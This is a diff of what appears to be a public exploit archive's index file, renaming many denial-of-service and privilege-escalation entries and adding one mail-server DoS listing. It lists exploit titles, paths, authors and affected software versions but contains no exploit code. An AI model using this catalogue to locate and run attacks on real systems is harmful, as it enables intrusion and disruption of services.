19488,platforms/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service",1999-09-05,"L. Sassaman",bsd,dos,0 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,windows,dos,0 -19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 +19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 - 'vfs_cache' Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0 19507,platforms/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",solaris,dos,0 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",hardware,dos,0 19531,platforms/hardware/dos/19531.txt,"Cisco IOS 12.0.2 - Syslog Crash",1999-01-11,"Olaf Selke",hardware,dos,0 @@ -2438,7 +2438,7 @@ id,file,description,date,author,platform,type,port 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME - Denial of Service",2000-09-12,Smashstack,windows,dos,0 20221,platforms/windows/dos/20221.pl,"Jack De Winter WinSMTP 1.6 f/2.0 - Buffer Overflow",2000-09-11,"Guido Bakker",windows,dos,0 20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - Denial of Service",1999-12-01,"Ussr Labs",windows,dos,0 -20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0 +20226,platforms/freebsd/dos/20226.c,"FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service",2012-08-03,"Shaun Colley",freebsd,dos,0 20228,platforms/windows/dos/20228.pl,"TYPSoft FTP Server 0.7.x - FTP Server Remote Denial of Service",1999-06-08,dethy,windows,dos,0 20229,platforms/multiple/dos/20229.txt,"IBM Websphere Application Server 3.0.2 Server Plugin - Denial of Service",2000-09-15,"Rude Yak",multiple,dos,0 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos,0 @@ -3012,7 +3012,7 @@ id,file,description,date,author,platform,type,port 23274,platforms/linux/dos/23274.pl,"Coreutils 4.5.x - LS Width Argument Integer Overflow",2003-10-22,druid,linux,dos,0 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention",2003-10-22,"Last Stage of Delirium",multiple,dos,0 23388,platforms/windows/dos/23388.txt,"Valve Software Half-Life Dedicated Server 3.1/4.1 - Information Disclosure/Denial of Service",2003-11-19,3APA3A,windows,dos,0 -23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 sysctl - Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0 +23389,platforms/openbsd/dos/23389.c,"OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service",2003-11-19,anonymous,openbsd,dos,0 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0 @@ -3220,7 +3220,7 @@ id,file,description,date,author,platform,type,port 24426,platforms/windows/dos/24426.html,"Opera Web Browser 7.23 - Empty Embedded Object JavaScript Denial of Service",2004-09-01,Stevo,windows,dos,0 24437,platforms/windows/dos/24437.py,"Apple Quick Time Player (Windows) 7.7.3 - Out of Bound Read",2013-01-29,"Debasish Mandal",windows,dos,0 24448,platforms/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,windows,dos,0 -24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 ftpd - Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 +24450,platforms/freebsd/dos/24450.txt,"FreeBSD 9.1 - 'ftpd' Remote Denial of Service",2013-02-05,"Maksymilian Arciemowicz",freebsd,dos,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 24468,platforms/windows/dos/24468.pl,"KMPlayer - Denial of Service",2013-02-10,Jigsaw,windows,dos,0 24511,platforms/windows/dos/24511.txt,"SAP NetWeaver Message Server - Multiple Vulnerabilities",2013-02-17,"Core Security",windows,dos,0 @@ -3666,7 +3666,7 @@ id,file,description,date,author,platform,type,port 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 - Integer Overflow",2013-10-08,"Jean Pascal Pereira",osx,dos,0 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0 -28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 +28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0 28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP - 'cmd.exe' Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0 @@ -3691,7 +3691,7 @@ id,file,description,date,author,platform,type,port 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0 29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 -29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0 +29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0 29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0 @@ -3982,7 +3982,7 @@ id,file,description,date,author,platform,type,port 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80 31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos,0 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - '.JPEG' File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0 -31550,platforms/bsd/dos/31550.c,"Multiple BSD Distributions - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 +31550,platforms/bsd/dos/31550.c,"BSD (Multiple Distributions) - 'strfmon()' Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0 @@ -4172,7 +4172,7 @@ id,file,description,date,author,platform,type,port 33043,platforms/linux/dos/33043.txt,"Linux Kernel 2.6.x (Sparc64) - '/proc/iomem' Local Denial of Service",2009-05-03,"Mikulas Patocka",linux,dos,0 33049,platforms/linux/dos/33049.txt,"LibTIFF 3.8.2 - 'LZWDecodeCompat()' Remote Buffer Underflow",2009-05-21,wololo,linux,dos,0 33056,platforms/windows/dos/33056.pl,"Symantec Endpoint Protection Manager 12.1.x - Overflow (SEH) (PoC)",2014-04-27,st3n,windows,dos,0 -33058,platforms/multiple/dos/33058.txt,"Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 +33058,platforms/multiple/dos/33058.txt,"BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption",2009-05-26,"Maksymilian Arciemowicz",multiple,dos,0 33059,platforms/windows/dos/33059.smpl,"BaoFeng Storm 3.9.62 - '.Playlist' File Buffer Overflow",2009-05-28,Jambalaya,windows,dos,0 33062,platforms/windows/dos/33062.txt,"Apple Safari 4 - 'reload()' Denial of Service",2009-06-02,SkyOut,windows,dos,0 33073,platforms/linux/dos/33073.c,"NTP ntpd monlist Query Reflection - Denial of Service",2014-04-28,"Danilo PC",linux,dos,123 @@ -4225,7 +4225,7 @@ id,file,description,date,author,platform,type,port 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0 33314,platforms/linux/dos/33314.html,"Mozilla Firefox 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0 33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 -33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 +33319,platforms/bsd/dos/33319.txt,"BSD (Multiple Distributions) - 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0 33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service",2010-02-02,"Li Ming",linux,dos,0 33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service",2010-02-02,"Marcelo Tosatti",linux,dos,0 33328,platforms/hardware/dos/33328.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Vulnerabilities",2014-05-12,"Luigi Vezzoso",hardware,dos,0 @@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port 35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0 35935,platforms/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,windows,dos,0 -35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 +35938,platforms/freebsd/dos/35938.txt,"FreeBSD - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos,0 35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",linux,dos,0 @@ -5065,7 +5065,7 @@ id,file,description,date,author,platform,type,port 39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0 39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 -39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 +39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0 39602,platforms/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos,0 @@ -5720,6 +5720,7 @@ id,file,description,date,author,platform,type,port 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0 43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0 43020,platforms/multiple/dos/43020.txt,"Mozilla Firefox < 55 - Denial of Service",2017-10-20,"Amit Sangra",multiple,dos,0 +43026,platforms/windows/dos/43026.py,"ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service",2017-10-21,"Berk Cem Göksel",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5801,8 +5802,8 @@ id,file,description,date,author,platform,type,port 273,platforms/linux/local/273.c,"SquirrelMail - 'chpasswd' Buffer Overflow",2004-04-20,x314,linux,local,0 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Privilege Escalation",2001-03-02,"Cody Tubbs",tru64,local,0 285,platforms/linux/local/285.c,"Slackware 7.1 - '/usr/bin/mail' Local Exploit",2001-03-03,kengz,linux,local,0 -286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation",2001-03-03,dethy,bsd,local,0 -287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation",2001-03-03,dethy,bsd,local,0 +286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation",2001-03-03,dethy,bsd,local,0 +287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b - 'prodb' Privilege Escalation",2001-03-04,"the itch",multiple,local,0 290,platforms/linux/local/290.sh,"GLIBC 2.1.3 - LD_PRELOAD Local Exploit",2001-03-04,Shadow,linux,local,0 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir - Local Buffer Overflow",2004-06-25,anonymous,unix,local,0 @@ -5839,7 +5840,7 @@ id,file,description,date,author,platform,type,port 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 -396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0 +396,platforms/bsd/local/396.c,"OpenBSD - 'ftp' Exploit",2002-01-01,Teso,bsd,local,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0 @@ -5877,7 +5878,7 @@ id,file,description,date,author,platform,type,port 714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0 715,platforms/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 718,platforms/linux/local/718.c,"Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0 -739,platforms/bsd/local/739.c,"FreeBSD /usr/bin/top - Format String",2001-07-23,truefinder,bsd,local,0 +739,platforms/bsd/local/739.c,"FreeBSD - '/usr/bin/top' Format String",2001-07-23,truefinder,bsd,local,0 741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0 744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0 @@ -5987,7 +5988,7 @@ id,file,description,date,author,platform,type,port 1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3/10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0 1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - SHELLOPTS/PS4 Environment Variables Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0 -1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure",2005-11-09,kingcope,bsd,local,0 +1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure",2005-11-09,kingcope,bsd,local,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Exploit",2005-12-07,c0ntex,solaris,local,0 @@ -6155,7 +6156,7 @@ id,file,description,date,author,platform,type,port 3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Exploit",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0 -3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 +3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 3587,platforms/linux/local/3587.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (1)",2007-03-27,"Robert Swiecki",linux,local,0 3593,platforms/windows/local/3593.c,"Corel WordPerfect X3 13.0.0.565 - '.prs' Local Buffer Overflow",2007-03-28,"Jonathan So",windows,local,0 3595,platforms/linux/local/3595.c,"Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)",2007-03-28,"Robert Swiecki",linux,local,0 @@ -6232,7 +6233,7 @@ id,file,description,date,author,platform,type,port 4517,platforms/windows/local/4517.php,"PHP 5.2.4 'ionCube' Extension - 'safe_mode' / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 4531,platforms/windows/local/4531.py,"jetAudio 7.x - '.m3u' Local Overwrite (SEH)",2007-10-14,h07,windows,local,0 4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions 'Safe_mode()' / 'disable_function' Bypass",2007-10-22,shinnai,windows,local,0 -4564,platforms/multiple/local/4564.txt,"Oracle 10g - CTX_DOC.MARKUP SQL Injection",2007-10-23,sh2kerr,multiple,local,0 +4564,platforms/multiple/local/4564.txt,"Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection",2007-10-23,sh2kerr,multiple,local,0 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (1)",2007-10-27,bunker,multiple,local,0 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g - SYS.LT.FINDRICSET SQL Injection (2)",2007-10-27,bunker,multiple,local,0 4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0 @@ -6330,7 +6331,7 @@ id,file,description,date,author,platform,type,port 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0 7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0 -7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0 +7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - 'ProxyLogin' Local Stack Overflow",2008-12-29,His0k4,windows,local,0 7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0 @@ -6374,7 +6375,7 @@ id,file,description,date,author,platform,type,port 7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow",2009-02-04,LiquidWorm,windows,local,0 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local,0 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0 -8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE Telnet Daemon - Privilege Escalation",2009-02-16,kingcope,freebsd,local,0 +8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation",2009-02-16,kingcope,freebsd,local,0 8067,platforms/multiple/local/8067.txt,"Enomaly ECP / Enomalism < 2.2.1 - Multiple Local Vulnerabilities",2009-02-16,"Sam Johnston",multiple,local,0 8074,platforms/multiple/local/8074.rb,"Oracle 10g - MDSYS.SDO_TOPO_DROP_FTBL SQL Injection (Metasploit)",2009-02-18,sh2kerr,multiple,local,0 8108,platforms/osx/local/8108.c,"Apple Mac OSX xnu 1228.x - Local Kernel Memory Disclosure",2009-02-25,mu-b,osx,local,0 @@ -6406,7 +6407,7 @@ id,file,description,date,author,platform,type,port 8249,platforms/windows/local/8249.php,"BS.Player 2.34 Build 980 - '.bsl' Local Buffer Overflow (SEH)",2009-03-20,Nine:Situations:Group,windows,local,0 8250,platforms/windows/local/8250.txt,"CloneCD/DVD 'ElbyCDIO.sys' < 6.0.3.2 - Privilege Escalation",2009-03-20,"NT Internals",windows,local,0 8251,platforms/windows/local/8251.py,"BS.Player 2.34 - '.bsl' Universal Overwrite (SEH)",2009-03-20,His0k4,windows,local,0 -8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Kernel Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 +8261,platforms/freebsd/local/8261.c,"FreeBSD 7.0/7.1 - 'ktimer' Privilege Escalation",2009-03-23,mu-b,freebsd,local,0 8266,platforms/osx/local/8266.txt,"Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation",2009-03-23,mu-b,osx,local,0 8267,platforms/windows/local/8267.py,"Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)",2009-03-23,His0k4,windows,local,0 8270,platforms/windows/local/8270.pl,"eXeScope 6.50 - Local Buffer Overflow",2009-03-23,Koshi,windows,local,0 @@ -6497,7 +6498,7 @@ id,file,description,date,author,platform,type,port 9064,platforms/windows/local/9064.pl,"AudioPLUS 2.00.215 - '.lst' / '.m3u' Local Buffer Overflow (SEH)",2009-07-01,hack4love,windows,local,0 9070,platforms/windows/local/9070.pl,"AudioPLUS 2.00.215 - '.pls' Local Buffer Overflow (SEH)",2009-07-01,Stack,windows,local,0 9072,platforms/multiple/local/9072.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (2)",2009-07-02,"Sumit Siddharth",multiple,local,0 -9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 +9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 - 'vfs.usermount' Privilege Escalation",2009-07-09,"Patroklos Argyroudis",freebsd,local,0 9083,platforms/lin_x86-64/local/9083.c,"Linux Kernel 2.6.24_16-23/2.6.27_7-10/2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation",2009-07-09,sgrakkyu,lin_x86-64,local,0 9097,platforms/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink Exploit",2009-07-09,kingcope,multiple,local,0 9104,platforms/windows/local/9104.py,"Photo DVD Maker Pro 8.02 - '.pdm' Local Buffer Overflow (SEH)",2009-07-10,His0k4,windows,local,0 @@ -6561,7 +6562,7 @@ id,file,description,date,author,platform,type,port 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - '.psh' Universal Buffer Overflow XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0 9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 -9489,platforms/multiple/local/9489.txt,"Multiple BSD Distributions - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0 +9489,platforms/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities",2009-08-24,kingcope,multiple,local,0 9492,platforms/windows/local/9492.c,"Avast! 4.8.1335 Professional - Kernel Local Buffer Overflow",2009-08-24,Heurs,windows,local,0 9495,platforms/windows/local/9495.pl,"Fat Player 0.6b - '.wav' Universal Local Buffer Exploit",2009-08-24,ahwak2000,windows,local,0 9501,platforms/windows/local/9501.py,"Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter)",2009-08-24,mr_me,windows,local,0 @@ -6838,7 +6839,7 @@ id,file,description,date,author,platform,type,port 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0 13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local,0 -14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 